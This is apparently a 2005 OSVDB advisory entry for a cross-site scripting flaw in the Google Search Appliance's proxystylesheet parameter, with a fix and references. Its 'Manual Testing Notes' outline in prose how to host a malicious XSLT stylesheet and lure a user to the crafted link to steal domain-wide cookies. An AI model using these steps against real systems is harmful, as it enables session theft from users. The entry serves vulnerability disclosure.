Google Search Appliance proxystylesheet XSLT XSS

2005-11-21T00:00:00
ID OSVDB:20980
Type osvdb
Reporter H D Moore(fdlist@digitaloffense.net)
Modified 2005-11-21T00:00:00

Description

Vulnerability Description

The Google Search Appliance contains a flaw that allows a remote cross site scripting attack. This flaw exists because the application will process a remote XSLT style sheet specified in the proxystylesheet parameter. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

Solution Description

Upgrade to the version specified by Google advisory GA-2005-08-m, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

Short Description

The Google Search Appliance contains a flaw that allows a remote cross site scripting attack. This flaw exists because the application will process a remote XSLT style sheet specified in the proxystylesheet parameter. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

Manual Testing Notes

Create a XSLT style sheet that contains the malicious javascript code, replace the proxystylesheet parameter with the URL to this style sheet, and then supply that link to the target user. This attack is particularly effective against domain-wide cookies when the appliance is given a name within that domain.

References:

Security Tracker: 1015246 Secunia Advisory ID:17644 Related OSVDB ID: 20979 Related OSVDB ID: 20978 Related OSVDB ID: 20977 Related OSVDB ID: 20981 Other Advisory URL: http://metasploit.com/research/vulns/google_proxystylesheet/ News Article: http://www.techworld.com/networking/news/index.cfm?NewsID=4840 News Article: http://www.webpronews.com/insiderreports/searchinsider/wpn-49-20051122GoogleMiniNeededBigSecurityPatch.html News Article: http://news.techwhack.com/2526/221129-google-fixes-security-flaws-in-google-mini/ News Article: http://www.eweek.com/article2/0,1895,1891796,00.asp FrSIRT Advisory: ADV-2005-2500 CVE-2005-3758 Bugtraq ID: 15509